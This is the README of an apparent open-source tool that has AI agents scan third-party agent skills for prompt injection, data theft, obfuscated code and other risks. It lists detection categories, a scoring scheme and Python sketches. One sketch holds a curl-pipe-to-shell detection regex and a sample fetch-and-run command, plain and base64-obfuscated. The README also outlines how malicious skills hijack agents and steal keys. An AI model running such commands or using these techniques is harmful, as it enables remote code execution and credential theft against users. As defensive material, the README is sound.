Skill Security Audit

Detect malicious AI agent skills before they compromise your system.

A cross-platform security audit skill that scans third-party AI agent skills, plugins, and tool definitions for security vulnerabilities. Uses AI semantic analysis with 61 detection patterns across 9 risk categories aligned with the OWASP Agentic AI Top 10. Zero dependencies -- works on any platform that supports AI agent skills.


Why This Exists

The AI agent skill ecosystem has a security problem. Third-party skills execute with your agent's full privileges, and marketplaces have limited vetting:

  • Snyk ToxicSkills -- 36.82% of MCP servers on ClawHub have at least one vulnerability
  • SlowMist -- 472+ malicious MCP servers identified with real-world credential theft and data exfiltration
  • Koi Security ClawHavoc -- 341 malicious servers found in 2,857 scanned

Skills can read your SSH keys, exfiltrate environment variables, install persistent backdoors, and inject prompts that override your agent's safety guardrails. Because a skill runs with the agent's privileges, a single malicious skill can compromise everything the agent can reach.


What It Detects

61 detection patterns across 9 categories:

| ID | Category | Severity | OWASP ASI | Patterns |
| --- | --- | --- | --- | --- |
| PI | Prompt Injection | CRITICAL | ASI01 | PI-001 to PI-008 |
| DE | Data Exfiltration | CRITICAL | ASI02 | DE-001 to DE-009 |
| CE | Malicious Command Execution | CRITICAL | ASI02, ASI05 | CE-001 to CE-010 |
| OB | Obfuscated/Hidden Code | WARNING | -- | OB-001 to OB-007 |
| PA | Privilege Over-Request | WARNING | ASI03 | PA-001 to PA-005 |
| SC | Supply Chain Risks | WARNING | ASI04 | SC-001 to SC-006 |
| MP | Memory/Context Poisoning | WARNING | ASI06 | MP-001 to MP-005 |
| TE | Human Trust Exploitation | WARNING | ASI09 | TE-001 to TE-006 |
| BM | Behavioral Manipulation | INFO | ASI10 | BM-001 to BM-005 |

Every pattern includes malicious examples, explanations of the danger, and false-positive guidance. See skills/skills-security-audit/references/security-rules.md for the full ruleset.


Quick Start

Option A: Claude Code Plugin (recommended for Claude Code users)

# Add the marketplace and install
/plugin marketplace add https://github.com/agentnode-dev/skills-security-audit.git
/plugin install skills-security-audit@agentnode-dev

Then restart Claude Code. The skill will appear in your available skills and trigger automatically when relevant.

Option B: Copy into any AI agent

Clone the repo and point your AI agent to the directory:

git clone https://github.com/agentnode-dev/skills-security-audit.git

Then tell your agent:

Load the skill at /path/to/skills-security-audit/skills/skills-security-audit/SKILL.md and audit the skill at /path/to/suspicious-skill/

Option C: Paste into any chat

Copy the contents of skills/skills-security-audit/SKILL.md into your AI agent's system prompt or conversation, then ask it to audit a skill. This works with any AI agent — no installation needed.

Usage

Once loaded, ask your agent:

Audit the skill at /path/to/suspicious-skill/

Or scan all installed skills:

Scan all my installed skills for security issues

How It Works

This is a pure Skill -- a markdown file that instructs any AI agent how to perform security audits. No code to install, no runtime to configure.

Phase 1: Determine Scan Scope

The skill identifies target files (.md, .json, .js, .py, .sh, .ts, .yaml, .yml) from the path you specify, a GitHub URL, or your platform's installed skills directory.
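
The skill itself contains no code; the agent performs this step by following the instructions in SKILL.md. Purely as an illustration of the selection rule, here is a minimal Python sketch that gathers files with the listed extensions from a local path. The function name `collect_target_files` and the case-insensitive extension match are assumptions made for this example, and GitHub URLs and installed-skill directories are not handled.

```python
from pathlib import Path

# Extensions listed in Phase 1 of this README.
TARGET_EXTENSIONS = {".md", ".json", ".js", ".py", ".sh", ".ts", ".yaml", ".yml"}


def collect_target_files(root):
    """Return the files under `root` whose extension is in TARGET_EXTENSIONS.

    Hypothetical helper: matching is case-insensitive (an assumption),
    and `root` may be either a single file or a directory.
    """
    root_path = Path(root)
    if root_path.is_file():
        candidates = [root_path]
    else:
        candidates = [p for p in root_path.rglob("*") if p.is_file()]
    return sorted(p for p in candidates if p.suffix.lower() in TARGET_EXTENSIONS)


if __name__ == "__main__":
    for path in collect_target_files("."):
        print(path)
```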

Phase 2: Analyze Each File

The AI agent reads each file and checks its content against all 61 detection patterns using semantic analysis. Unlike regex-based tools, which only flag text that matches a fixed pattern, the agent reasons about what the content is trying to do, so it can also catch obfuscated, paraphrased, and novel variants of an attack.
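
To make the limitation of string matching concrete, here is a small Python sketch. The rule `NAIVE_PIPE_TO_SHELL` is invented for this example and is not taken from the skill's ruleset; it flags a plain download-and-execute one-liner but misses the same command once it is base64-encoded.

```python
import base64
import re

# Hypothetical string-matching rule: flags "curl <url> | sh" style one-liners.
NAIVE_PIPE_TO_SHELL = re.compile(r"curl\s+\S+\s*\|\s*(?:ba)?sh")


def naive_match(text: str) -> bool:
    """Return True if the text contains a literal curl-pipe-to-shell command."""
    return NAIVE_PIPE_TO_SHELL.search(text) is not None


# The same payload, once in the clear and once wrapped in base64.
plain = "curl https://example.invalid/x | sh"
encoded = base64.b64encode(plain.encode()).decode()
obfuscated = f"echo {encoded} | base64 -d | sh"

print(naive_match(plain))       # True
print(naive_match(obfuscated))  # False: the literal "curl" never appears
```

Both strings run the same command when executed, which is the kind of equivalence a reader (human or AI) has to reason about rather than match on.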

Phase 3: Generate Report

The agent produces a structured report with a severity rating, an evidence citation (file path and line number), and actionable remediation for each finding.
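
The exact report layout is defined by SKILL.md and is not reproduced here. As a rough sketch of the information each finding carries, the following Python record uses field names and an output format that are assumptions for illustration only; the sample values are placeholders, not real audit output.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    """One report entry (hypothetical shape, not the skill's actual schema)."""
    pattern_id: str   # e.g. an ID from the pattern table, such as "DE-001"
    severity: str     # "CRITICAL", "WARNING", or "INFO"
    file_path: str    # evidence citation: file
    line: int         # evidence citation: line number
    evidence: str     # what was observed at that location
    remediation: str  # what the user should do about it


def format_finding(f: Finding) -> str:
    """Render a finding as a short, human-readable block."""
    return (
        f"[{f.severity}] {f.pattern_id} at {f.file_path}:{f.line}\n"
        f"  evidence: {f.evidence}\n"
        f"  remediation: {f.remediation}"
    )


# Placeholder values for illustration only.
example = Finding(
    pattern_id="DE-001",
    severity="CRITICAL",
    file_path="suspicious-skill/setup.sh",
    line=12,
    evidence="reads a private SSH key and sends it to a remote host",
    remediation="do not install; remove the network call and report the skill",
)

print(format_finding(example))
```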


Risk Scoring

Each finding contributes to the risk score:

| Finding Severity | Points |
| --- | --- |
| CRITICAL | +2.0 |
| WARNING | +0.8 |
| INFO | +0.2 |

Risk levels (max 10.0):

| Score | Level | Action |
| --- | --- | --- |
| 0.0 -- 2.0 | SAFE | No significant risks found |
| 2.1 -- 5.0 | RISKY | Manual review recommended before use |
| 5.1 -- 8.0 | DANGEROUS | Do not install |
| 8.1 -- 10.0 | MALICIOUS | Confirmed malicious intent -- report to marketplace |
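
The arithmetic behind the two tables can be sketched in Python as follows. This assumes the score is the plain sum of per-finding points, capped at 10.0; the README states the maximum but not how it is enforced, so the cap is an assumption, as are the function names. Points are kept in tenths so the sums stay exact integers.

```python
# Points per finding, in tenths of a point (2.0 -> 20) to avoid float drift.
POINTS_TENTHS = {"CRITICAL": 20, "WARNING": 8, "INFO": 2}
MAX_TENTHS = 100  # assumed cap, from "max 10.0"


def risk_score(severities):
    """Sum the points for a list of finding severities, capped at 10.0."""
    total = sum(POINTS_TENTHS[s] for s in severities)
    return min(total, MAX_TENTHS) / 10


def risk_level(score):
    """Map a score to the level named in the risk-level table."""
    tenths = round(score * 10)
    if tenths <= 20:
        return "SAFE"
    if tenths <= 50:
        return "RISKY"
    if tenths <= 80:
        return "DANGEROUS"
    return "MALICIOUS"


findings = ["CRITICAL", "WARNING", "INFO"]
score = risk_score(findings)
print(score, risk_level(score))  # 3.0 RISKY
```

Under this reading, one CRITICAL finding on its own scores exactly 2.0, which is the top of the SAFE band, so treat any CRITICAL finding as worth a manual look regardless of the total; the skill's own instructions may handle this case differently.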

Platform Support

This skill is pure markdown — any AI agent that can read files or accept pasted instructions can use it.

Native skill loading (agent reads SKILL.md directly):

  • Claude Code (via plugin install or local file)
  • Cursor (via .cursorrules or project context)
  • Windsurf (via project context)
  • OpenClaw / ClawHub

Copy-paste (paste SKILL.md content into conversation):

  • ChatGPT, Gemini, OpenAI Agents, or any LLM chat interface

Based On

This skill's detection patterns are informed by real-world threat intelligence:

  • SlowMist -- Analysis of 472+ malicious MCP servers on ClawHub, including two-stage payload loading, file harvesting, and platform relay techniques
  • Snyk ToxicSkills -- Research finding 36.82% vulnerability rate across ClawHub MCP servers
  • Koi Security ClawHavoc -- Discovery of 341 malicious servers in 2,857 scanned
  • OWASP Agentic AI Top 10 -- Framework for categorizing agentic AI security risks (ASI01 through ASI10)

Contributing

Contributions are welcome. To add a new detection pattern:

  1. Add the rule to skills/skills-security-audit/references/security-rules.md following the existing format (pattern, malicious example, danger explanation, false-positive guidance)
  2. Update the summary table in both security-rules.md and SKILL.md (both under skills/skills-security-audit/)
  3. Submit a pull request with a description of the threat the new pattern addresses

License

MIT